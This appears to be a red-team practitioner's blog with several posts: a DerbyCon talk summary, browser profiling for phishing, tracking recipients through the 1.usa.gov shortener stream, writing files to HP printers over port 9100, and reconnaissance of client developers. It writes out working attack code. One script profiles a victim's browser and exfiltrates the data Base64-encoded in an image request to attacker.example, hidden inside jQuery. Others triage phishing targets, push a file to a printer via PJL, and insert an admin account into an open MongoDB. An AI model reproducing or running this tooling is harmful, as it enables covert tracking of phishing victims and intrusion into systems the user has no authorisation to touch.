DerbyCon briefing 2018

Hi All,
I didn’t get as much time as I needed, so here is the briefing with a few additional slides added.
DerbyCon2018_Sayen_brief_variant

Video of briefing:
https://www.irongeek.com/i.php?page=videos/derbycon8/stable-00-red-teaming-gaps-and-musings-samuel-sayen

It was interesting to see several other briefings built around the exact same underlying point, each arriving at different creative solutions.

“Gryffindor | Pure Javascript, Covert Exploitation” by Matthew Toussain of BlackHills Security, and “FoxTrot C2: A Journey of Payload Delivery” by Dimitry Snezhkov were both tool reveal talks, but focused on the same underlying points as my talk.

1. Real-world attackers have more resources than Red Teams
2. Detecting a Red Team may give a client the wrong impression that they are resilient to targeting by an APT

Both of their talks addressed this by releasing new and novel tools, in this case an endpoint agent (Gryffindor) and a C2 framework (FoxTrot C2). My idea was simply to skip the details of endpoint compromise and phishing, whitelist the payload, and by doing so bring yourself into parity with an APT. You are inside the network, you have persistence, let the real test begin. So I guess you could say my idea was born out of pragmatism and the notion that, although staying even with APTs may be possible for periods at a time, it is not sustainable for the red teaming community over the long haul.

This is just a call to use stealthy Internal Penetration Testing where the SOC is being tested. It is not a new idea, or something I made up; it is simply a new way to frame and think about an already existing style of engagement. If we agree with the “Assume Breach” mentality, we should consider a stealthy internal test the closest thing to real world threat emulation, unless you are a red team with a golden ticket to break the law. If that’s the case, let me know if you are hiring. Either way, let me know what your thoughts are.

Sam (keyzer a.T. protonmail.ch).

Thoughts on user profiling

Boy oh boy has it been a while. New job, new state, new house, new excuses 🙂

I wanted to make a post on user profiling as a way to document and work out my own thoughts on the subject. Sometimes things that sound great in your head look utterly stupid once you put them to “ink”. This is also a good time to talk about a script that I pushed to GitHub:

https://github.com/keyzerrezyek/JQueryingU

This script has some background info on the GitHub page, including info on the original author. I took his work, added Flash support, minified and packed the script, then put it inside legitimate jQuery. The profiling exfil method was modified to ride inside a Base64-encoded image GET request rather than a POST.
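To make that concrete, here is a minimal, hedged sketch of the general exfil approach (not the actual JQueryingU code): collect a few browser properties, Base64-encode the result, and send it out as the query string of an image request so it blends in with analytics traffic. The domain is a placeholder.

// Minimal sketch of the exfil technique (not the actual JQueryingU code):
// gather a few browser properties, Base64-encode them, and smuggle the
// result out as the query string of an image request so it looks like
// ordinary analytics traffic. attacker.example is a placeholder domain.
(function () {
  var profile = [
    'id=sam',
    'Screen Size: ' + screen.width + ' x ' + screen.height,
    'Language: ' + (navigator.language || navigator.userLanguage),
    'Cookies: ' + navigator.cookieEnabled,
    'Full User Agent: ' + navigator.userAgent
  ].join('|');

  // btoa() is fine for ASCII; real code should escape non-Latin1 characters first.
  var beacon = new Image();
  beacon.src = 'https://attacker.example/analytics.gif?uid=' + btoa(profile);
})();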

This post looks at the value of profiling users and asks whether there are other benefits that have been overlooked.

Profiling activity through websites can be broken down into two categories:

  • Passive – no profiling script. The attacker just looks at the User-Agent of GET requests hitting an attacker-controlled domain (see the sketch below this list)
  • Active – a profiling script and/or cookies are used. The attacker monitors the POST or encoded GET request output from the profiling script
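For the passive case, the “tooling” is really just your web server’s access log. Here is a minimal sketch that pulls the User-Agent out of each request line, assuming a standard combined log format where the UA is the final quoted field; the filename in the usage comment is illustrative.

// Passive profiling sketch: extract the User-Agent from each access-log
// line, assuming combined log format (UA is the final quoted field).
// Usage: cat access.log | node useragents.js
var readline = require('readline');

var rl = readline.createInterface({ input: process.stdin });
rl.on('line', function (line) {
  var match = line.match(/"([^"]*)"\s*$/);
  if (match) {
    console.log(match[1]);
  }
});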

The obvious benefit of passive is that there is no “script” for the victim’s SOC to find in the event that an email gets flagged as suspicious. The downside is that there are limits to the info you can get from a User-Agent; information such as support for Flash and Java will not be present. The benefits of active are the exact inverse of passive. That being said, plenty of legitimate “profiling” scripts are used by non-malicious websites to make sure the proper content is delivered, so in my opinion the rewards far outweigh the risks. I might make an exception if the target is a known “hard target” or a person of importance whose email will be under a higher degree of scrutiny.

Focusing on the active side of things, what do we want to get out of profiling?

The obvious answer is, “the user’s plugins and versions so we can craft a targeted exploit if applicable.” While that is still true, I believe it is becoming less relevant as Flash slowly phases out. Corporations oftentimes need to run Java, but sending an “exploit” to the endpoint is fairly risky when you don’t know what EDR products are on the workstation. Criminals had no problem doing this back in the day with exploit kits because it’s a numbers game for them, and they weren’t trying to target one specific corporation the way a Red Teamer is.

A more nuanced benefit is that you can get an idea of which users are likely to click on links, and then follow up down the road with an actual payload for the specific users who are known “clickers”. There is no point in spraying your malicious link across an organization’s inboxes if you don’t have to. APTs are well known for performing recon before delivering payloads, but many Red Teams do not since they are on a tight timeframe.

I have no scientific data to back it up, but screen resolution is my favorite piece of data returned. Why? Most sandboxes report very low resolutions, and I don’t believe I have ever seen one report a more modern 1920-wide resolution. Additionally, if you get some crazy high resolution like 3840, I would stereotypically say that user might be a higher priority target like a developer or sysadmin; I would also caution that those are the users more likely to report phishing or poke at your infrastructure. My ideal target is running IE at a resolution around 1600 wide. Few technical users surf the web with IE if they have any other option, and most orgs have Chrome/Chromium or Firefox alongside the corporate-mandated IE that exists for some crappy legacy app that absolutely must be supported. So anyone with IE and a lower resolution is oftentimes our standard, non-technical office grunt. That being said, if people click links inside Outlook, they will sometimes open in IE if it is set as the default browser.
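To show how those heuristics might be applied, here is a rough sketch that triages decoded profile strings (the pipe-delimited format shown in the example output further down). The thresholds are my own illustrative guesses, not anything rigorous.

// Rough triage of a decoded profile string. Heuristics only: a very low
// resolution smells like a sandbox, a very high one suggests a technical
// user, and IE at a modest resolution suggests a standard office user.
function triage(profile) {
  var fields = {};
  profile.split('|').forEach(function (part) {
    var idx = part.indexOf(':');
    if (idx > -1) fields[part.slice(0, idx).trim()] = part.slice(idx + 1).trim();
  });

  var width = parseInt((fields['Screen Size'] || '0 x 0').split('x')[0], 10) || 0;
  var isIE = /MSIE|Trident/.test(fields['Full User Agent'] || '');

  if (width > 0 && width < 1024) return 'possible sandbox';
  if (width >= 3000) return 'likely technical user: higher value, higher risk';
  if (isIE && width <= 1680) return 'likely non-technical user: good phishing target';
  return 'no strong signal';
}

// Example: triage('id=sam|Screen Size: 800 x 600|Full User Agent: Mozilla/4.0 (compatible; MSIE 8.0)')
//   -> 'possible sandbox'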

An additional benefit is that you can embed a profiling script on a web page which contains a payload and then send each targeted user a link with a unique URI. For example, send users a link to http://example.com/clickme.php?companyname=unique_id where each unique_id is correlated to a particular targeted user. The profiling script I have put on GitHub is designed to be used this way. You would be amazed at how much traffic your site starts getting as soon as you start phishing. Being able to determine where the “leak” is, and whether requests outside your targeted users are general spidering behavior or threat hunters performing targeted “poking”, is useful for gauging the overall security posture of your target. On past engagements I have heard a Tier 2 SOC analyst proudly say, “Did you see my request to your site? I used the Googlebot User-Agent.” Of course a seasoned SOC will not typically touch any suspected attack infrastructure. But… this is the real world and it happens.
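Generating those per-user links is trivial to script. A minimal sketch, using the same placeholder URL as above and made-up recipients:

// Sketch: generate one tagged link per targeted user so hits in the access
// log can be tied back to a specific recipient. Domain, path, and parameter
// name are placeholders; the emails are made up.
var crypto = require('crypto');

var targets = ['alice@example.com', 'bob@example.com'];

var links = targets.map(function (email) {
  var uniqueId = crypto.randomBytes(6).toString('hex');
  return {
    email: email,
    url: 'http://example.com/clickme.php?companyname=' + uniqueId
  };
});

console.log(JSON.stringify(links, null, 2));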

The profiling script, which is 90% the code created by Christian Ludwig (credited on my GitHub), is pretty standard. It gives you the following info.

http://localhost:8000/index.php?id=sam|OS: Mac OS X 10.13|Browser: Firefox 60 (60.0)|Mobile: false|Flash: 29.0 r0|Java: false|Cookies: true|Screen Size: 1680 x 1050|Language: en-US|Full User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0

The original request inside your access log will look as follows:

Example Log output: [Mon Apr 16 11:51:17 2018] ::1:63582 [200]: /analytics.gif?uid=aHR0cDovL2xvY2FsaG9zdDo4MDAwL2luZGV4LnBocD9pZD1zYW18T1M6IE1hYyBPUyBYIDEwLjEzfEJyb3dzZXI6IEZpcmVmb3ggNjAgKDYwLjApfE1vYmlsZTogZmFsc2V8Rmxhc2g6IDI5LjAgcjB8SmF2YTogZmFsc2V8Q29va2llczogdHJ1ZXxTY3JlZW4gU2l6ZTogMTY4MCB4IDEwNTB8TGFuZ3VhZ2U6IGVuLVVTfEZ1bGwgVXNlciBBZ2VudDogTW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTAuMTM7IHJ2OjYwLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjAuMA==
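Recovering the profile from the access log is just a matter of pulling out the uid parameter and Base64-decoding it. A minimal sketch that reads the log on stdin (the script name is illustrative):

// Sketch: extract the Base64 uid parameter from access-log lines and decode
// it back into the profile string.
// Usage: cat access.log | node decode_uids.js
var readline = require('readline');

var rl = readline.createInterface({ input: process.stdin });
rl.on('line', function (line) {
  var match = line.match(/uid=([A-Za-z0-9+\/=]+)/);
  if (match) {
    console.log(Buffer.from(match[1], 'base64').toString('utf8'));
  }
});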

Happy Profiling.

Thoughts on Krebs article about .gov URL shortener abuse

——————Update: 19 Apr 2016

Nearly a month later the same spam campaign is still attempting to use the Virginia government website to refer spam victims to their strikenx.bid and assembled.accountant domains. Either people are reading spammy emails a month late, or the idiots in charge of the campaign haven’t changed it despite the referral not working properly.

Of note, some other pushers seem to be trying to exploit the referral mechanism of an EPA website, but are failing as well.

[screenshot: new_spam_campaign]

[screenshot: new_spam_campaign2]

One other thing I was thinking about with regard to reconnaissance is the Witchcoven campaign that FireEye reported on: https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf

Although the profiling you can do with the method I detailed below is much more limited than what the Witchcoven actors are using, there is one distinct advantage to my method: there is no infrastructure and there are no indicators to uncover, since you don’t need to compromise a legitimate server or even buy your own profiling servers. With no easy way to link the reconnaissance to the next step, which would be delivering the targeted recipients an exploit based on their Android kernel and browser, it would be significantly harder to figure out whether victims are random targets of opportunity or were deliberately chosen…

——————–end update

——————Update: 31 March 2016

I found another “fun” use for the data coming off the developer stream for the bit.ly gov shortener 1usagov.

Everybody talks about how bad the Android ecosystem is at updates, and how the majority of phones in the field are vulnerable to something or other. It is nice to see the data for myself, though. By curl’ing the developer stream and then grep’ing for Android versions it becomes pretty apparent. I’m not even going to bother making iOS comparisons because that has been done to death. Needless to say, the world is ripe for the droid malware ecosystem, or worse.

[screenshot: android]

curl --url http://developer.usa.gov/1usagov | grep -o 'Android [0-9]\.[0-9]\.[0-9]'

[screenshot: android2]
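If you want counts rather than raw lines, the stream can be piped through a small script instead of grep. A minimal sketch (assuming the developer feed is still live and is being piped in from curl; the script name is illustrative):

// Sketch: tally Android versions seen on the 1.usa.gov developer stream.
// Usage: curl --url http://developer.usa.gov/1usagov | node tally_android.js
var readline = require('readline');

var counts = {};
var rl = readline.createInterface({ input: process.stdin });

rl.on('line', function (line) {
  var matches = line.match(/Android [0-9]+(\.[0-9]+)*/g) || [];
  matches.forEach(function (version) {
    counts[version] = (counts[version] || 0) + 1;
  });
});

rl.on('close', function () {
  console.log(counts);
});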

XP is dead, long live XP!
——————–end update

[screenshot: xp]
Brian Krebs reported on this issue last week and I did some poking today so I thought I would write a small article.

http://krebsonsecurity.com/2016/03/spammers-abusing-trust-in-us-gov-domains/

As reported by Krebs, bit.ly offers a URL shortener for government addresses such as .gov, .mil, etc. The main security issue is that if a spammer or malware pusher can find any local or state government site that will refer or redirect visitors to an arbitrary site, they can in turn use the bit.ly service to shorten that link into a more legitimate-looking 1.USA.gov address.

On my Linux box I ran the following command to find an active spam operation.

curl --url http://developer.usa.gov/1usagov | grep "VAURL"

The results showed a Russian spam operation attempting to abuse a va.gov domain, but failing at it since the Virginia website was not correctly redirecting to their URLs.
[screenshot: spam_campaign]

Domains associated with this particular Russian IP, and the spam campaign.
[screenshot: spam_campaign3]

The more interesting thing for me isn’t the shortening tactic, but the USA.gov developer view that Krebs reported.

http://developer.usa.gov/1usagov
[screenshot: developer]

If IPs were included, this would be pretty close to the ideal control panel you would want for running a malware/spam campaign.

What is interesting about this to me?

I can take a LEGITIMATE and unique URL for a government website, run it through the bit.ly shortener so it becomes an http://1.usa.gov/…. link, send it to someone, and then learn information about their browser and timezone. Normally I would have to use BeEF, cookies, etc. Now I can do it without using cookies or owning any public domains/IPs.

My idea in practice.

Find a random unique gov address:

http://www.fsis.usda.gov/wps/portal/fsis/topics/food-safety-education/get-answers/food-safety-fact-sheets/meat-preparation/ground-beef-and-food-safety/ct_index

Shorten it through bit.ly
http://1.usa.gov/1drrCH6

Curl the developer API website for the unique URL:

curl --url http://developer.usa.gov/1usagov | grep "http://www.fsis.usda.gov/wps/portal/fsis/topics/food-safety-education/get-answers/food-safety-fact-sheets/meat-preparation/ground-beef-and-food-safety/ct_index"

And sure enough… I get a hit showing my OS, browser, language, and timezone, which could be useful info for targeting further messages in a spam or malware campaign. Since this is a unique address sent to one person, I know there won’t be a false positive. Well, at least there wasn’t going to be until I posted it in this blog… 😉

[screenshot: Capture_me]
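Rather than re-running the curl | grep by hand, the developer stream could be watched continuously for hits on the unique link. A minimal sketch that just treats the feed as lines of text (the feed may have changed or disappeared since this was written; the script name is illustrative):

// Sketch: watch the 1.usa.gov developer stream for hits on the unique long URL.
// Usage: curl --url http://developer.usa.gov/1usagov | node watch_hits.js
var readline = require('readline');

var targetUrl = 'http://www.fsis.usda.gov/wps/portal/fsis/topics/food-safety-education/' +
  'get-answers/food-safety-fact-sheets/meat-preparation/ground-beef-and-food-safety/ct_index';

var rl = readline.createInterface({ input: process.stdin });
rl.on('line', function (line) {
  if (line.indexOf(targetUrl) !== -1) {
    console.log(new Date().toISOString() + ' HIT: ' + line);
  }
});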

TAAS – Tracking As A Service. Is that a thing?

HP JetDirect in the news… when it isn’t actually news

Last week my Twitter feed had a post about an article, which got some coverage, claiming thousands of HP printers allow anonymous FTP access via the JetDirect protocol.

[screenshot]

This was a bit surprising, not because of the vulnerability, but because it was making the news despite being really old information. The weaknesses in the JetDirect protocol (port 9100) used by HP printers have been known for years. I first learned about them in 2012 from a team member on a Red Cell; no idea how long he had known about them. Here is an article explaining it from 2013: https://www.nowsecure.com/blog/2013/01/14/exploiting-printers-via-jetdirect-vulnerabilities/

I’m not ragging on the guy that reported it, but all of his headline-making security news articles have been nothing more than searches of Shodan results for already-known issues.

The vulnerability is semi-useful on internal networks for hosting malicious files (code coming from an internal IP is sometimes trusted or evades CIRT scrutiny). In theory this makes printers an ideal place for miscreants to host malware, since HTTP(S) traffic is the best way to blend in with normal traffic and avoid firewall rules.
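For reference, this is roughly what writing a file to a printer over raw port 9100 looks like using PJL filesystem commands. Treat it as a hedged sketch: the target path, command support, and stability vary wildly by model, the IP and filename here are placeholders, and as noted below the attempt very often just crashes the device.

// Sketch: push a small file onto a printer's storage over raw port 9100
// using a PJL FSDOWNLOAD command. Support and paths differ per model, and
// this frequently crashes the print service entirely.
var net = require('net');

var host = '192.168.1.50';                      // placeholder printer IP
var payload = Buffer.from('hello from the printer\n');
var UEL = '\x1b%-12345X';                       // PJL Universal Exit Language sequence

var header = UEL + '@PJL FSDOWNLOAD FORMAT:BINARY SIZE=' + payload.length +
  ' NAME="0:\\payload.txt"\r\n';

var socket = net.connect(9100, host, function () {
  socket.write(header);
  socket.write(payload);
  socket.end(UEL);
});

socket.on('error', function (err) {
  console.error('Printer connection failed: ' + err.message);
});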

What the article failed to acknowledge is that, in my testing, 95 times out of 100 uploading even a very small file to an HP printer through JetDirect will crash the service and the device. In my opinion, the threat these unsecured, internet-facing printers pose in this regard is minimal at best. The miscreants that push malware can buy cheap server space using stolen credit cards or anonymous payment methods. Additionally, real web servers that can actually handle traffic can be infected via WordPress vulnerabilities and misconfigurations nearly as easily as these HP printers, with the aid of Shodan.io for targeting. The last thing a criminal wants is for the spear phishing to be successful but the infections to fail due to crappy hosting for the malware.

A more accurate assessment of this threat would be to comb the Shodan results for “Port:9100” looking for malicious files already hosted on these HP printers. I am guessing the number would be nearly non-existent, and not because the malware pushers don’t know about the opportunity, but because it isn’t worth their time.

IMHO a more worthwhile malicious use of multi-function devices would be trying to configure any digital sender functionality to go through your personal SMTP gateway so that you can take copies of internal documents. If they are using LDAP for authentication, that also opens up the possibility of stealing credentials if you can pipe the queries through the attacker’s box.

[screenshot]

Another printer bites the dust after uploading a file…

Thoughts on expanding your scope

I know I have been fairly inactive on here lately, so I figured I would start the new year off on the right foot by posting an article even if it is rather non technical.

Clients looking to have an assessment of their IT infrastructure and personnel via a penetration test always have to spell out what is in scope so nobody gets into legal trouble or crashes production systems. Unfortunately, when you are the good guy you have pesky things to worry about that Sergey in his Adidas tracksuit never has to think about. “What if my banking RAT spreads onto the HR systems and accidentally steals PII?” – said no attacker ever. In the long run clients usually want a test to be as real-world as possible, but they certainly don’t want downtime or lost money. It is a reasonable accommodation because, as Wu-Tang elegantly puts it, Cash Rules Everything Around Me (CREAM).

Things can get a bit more ambiguous with scope if you are using enterprise services from third parties (Amazon EC2, Dropbox Enterprise, etc.), but most of them have fine print and proper forms that can be filled out to allow the penetration test to include your assets hosted on their servers. Let’s face it, the day and age of a static IP range of company-owned hardware is mostly behind us. On top of this, modern organizations have a complex and sometimes undocumented attack surface that includes co-located, leased, virtualized, and on-demand servers and services, potentially spanning multiple countries with their varying cyber laws.

What a client tells you is their IT assets rarely lines up with all the potential ways they can be digitally compromised.

On a recent assessment I came across some vulnerabilities unknowingly (from the client’s perspective) created by the company they contracted to build the website and mobile app. This got me thinking about how rarely anyone includes third-party developers in the scope of a penetration test, even though they oftentimes still maintain clones or testing versions of your target.

You come in as a pen tester to look at the finished or nearly complete website/app that the client points you at. That’s great and all, but don’t forget that at some point there were likely dozens of versions created and tested back on the web/app developer’s network. Unless you make an effort to uncover where those assets are, you might be missing an expanded attack surface in your assessment.

I am not saying that, without clearly defined guidelines, you can compromise an outside developer’s network in order to gain access to your client. What I am saying is that, at a minimum, you should be looking at them for data which can be leveraged in a pen test. If your client paid to have a website created and a clone of it is sitting on a separate subdomain, you should attempt to have that included in the scope. If that is not doable, there is still plenty you can do as a sort of pentest-lite that keeps you legally clear. Below are some very well known tools and techniques that can be used passively(ish) and still give you good results. Notice I am not mentioning using Burp for SQL injection or anything aggressive.

Passive Recon of Developer Networks:

Robtex.com (the old site is still more functional) – Look at what lives in the IP range of your client AND the company that made the website/app. Look at the reverse lookups to determine whether the company has something live like dev.yourclient.webcompany.com. This can also be a place to find developer companies holding duplicates of your client’s SSL certificates…

shodan.io – Not even sure I have to say this. What cannot be overstated is that if there is a glaring vulnerability documented by Shodan, you are certainly not the first to find it. Beyond the dangers of leaked data and of the testing DB’s structure being exposed (which can help with SQL injection against the production network), don’t underestimate the danger of open access to a test database. How is the testing/dev backend being brought online for production? As things currently stand, thousands of MongoDB instances have anonymous read/write access. What’s to stop me from adding an account to the testing database if I know it is going to be replicated over once it goes into production? (See the sketch after this list.)

Case in point, here is a common sight if you do DB searches:

[screenshot]

Google.com – Don’t laugh. Use special searches to look for juicy info that might be unlinked or intended to be internal. I have found dozens of sensitive documents, PII spills, and change request docs using this method. Example: inurl:dev.company.gov "Internal Use Only". Google has a knack for indexing documents that companies forget about because they are no longer linked from any website. Even if a document is gone now, you might be able to get its text from the cache if you are lucky. On a recent assessment I found that the developers had decided to put all their internal change docs in an indexed directory for some odd reason. In one of those documents they duly noted that they had backdoored the website with the account “Developer:1234”. To think I was wasting time reversing an Android APK to look for credentials…

Burp spider – The staple of every webapp testing toolset. Let the spider run on your client’s domain AND the developer’s website. Developers have a way of leaving behind testing URLs or directories inside comments in JavaScript files for some reason.
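Tying back to the Shodan item above, here is a minimal, hypothetical sketch of what planting an account in an anonymously writable test MongoDB could look like, using the Node.js mongodb driver. The host, database, collection, and account values are all placeholders, and whether such a write ever flows into production depends entirely on how the developer promotes test data.

// Sketch: insert an account document into a wide-open test MongoDB instance.
// Requires the official driver: npm install mongodb
// Host, database, collection, and document contents are placeholders.
const { MongoClient } = require('mongodb');

async function main() {
  const client = new MongoClient('mongodb://test-db.example.com:27017');
  await client.connect();

  const users = client.db('appdb').collection('users');
  await users.insertOne({
    username: 'developer2',
    role: 'admin',
    created: new Date()
  });

  await client.close();
}

main().catch(console.error);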

Maybe more to come… Have fun.